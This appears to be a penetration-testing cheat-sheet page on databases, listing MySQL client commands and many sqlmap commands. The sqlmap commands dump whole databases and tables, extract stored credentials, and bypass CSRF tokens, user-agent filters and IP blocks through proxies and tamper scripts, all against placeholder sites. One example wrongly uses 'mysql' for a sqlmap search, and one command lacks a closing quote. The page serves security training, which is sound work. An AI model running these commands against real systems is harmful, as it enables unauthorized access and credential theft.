Databases

Databases vary widely, each requiring specific commands, tools, and syntax. This chapter provides guidance on navigating these differences.

This chapter is in-progress.

Check the index on the right to navigate this page more easily.

Database Management Systems

MySQL

Connect to a MySQL server

# Local service
mysql -u acuity -pSuperStr00ng!

# Remote service
mysql -u acuity -p -h <IP> -P 3306

List all databases

show databases;

Select a database

use name_of_database;

List all tables in the active database

show tables;

List content of a table

# List all content
select * from name_of_table;

# Define a more specific selection
select username, password from users where username = 'HTB';

Microsoft SQL

PostgreSQL

Tools

SQLMap

An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. https://sqlmap.org/

Basic Data Enumeration

# Check version, user, db name and admin permissions
sqlmap -u "http://www.acuity.lab/?id=1" --banner --current-user --current-db --is-dba

Table Enumeration

# Dump everything from MySQL server (no system databases) and require no user input
sqlmap -u "http://www.example.com/?id=1" --dump-all --exclude-sysdbs --batch

# Dump everything from a specific database
sqlmap -u "http://www.example.com/?id=1" -D database --dump

# Enumerate all tables within the specified DB
sqlmap -u "http://www.example.com/?id=1" --tables -D database

# Dump all data from the specified table
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database

# Dump only specific columns from specified table
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database -C name,password

# Limit rows dumped by ordinal numbers
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database --start=2 --stop=3

# Dump data based on matched conditions
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database --where="name = 'acuity'"

# alternative
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D database --where="name LIKE 'acu%'"

Search for columns, tables or databases

Switch --search needs to be used in conjunction with one of the following support options:

-C following a list of comma-separated column names to look for across the whole database management system.
-T following a list of comma-separated table names to look for across the whole database management system.
-D following a list of comma-separated database names to look for across the database management system.

Example:

# Search for tables containg "cred" in their name across DBMS
mysql -u "http://www.example.com/?id=1" --search -T cred

Dumping database-specific credentials

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Bypassing security measures

# Using random values
sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp

# Bypassing anti-CSRF
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token

# Using proxy
sqlmap -u "http://www.example.com/" --proxy="socks4://203.0.113.50:3128"

# Supplying a proxy list
sqlmap -u "http://www.example.com/" --proxy-file=/opt/proxys/list.txt

# Bypassing User-Agent filters
sqlmap -u "http://www.example.com/" --random-agent

# Tamper Scripts
sqlmap -u "http://www.example.com/" --tamper=<script.py>

PreviousServices NextSMB

Last updated 10 months ago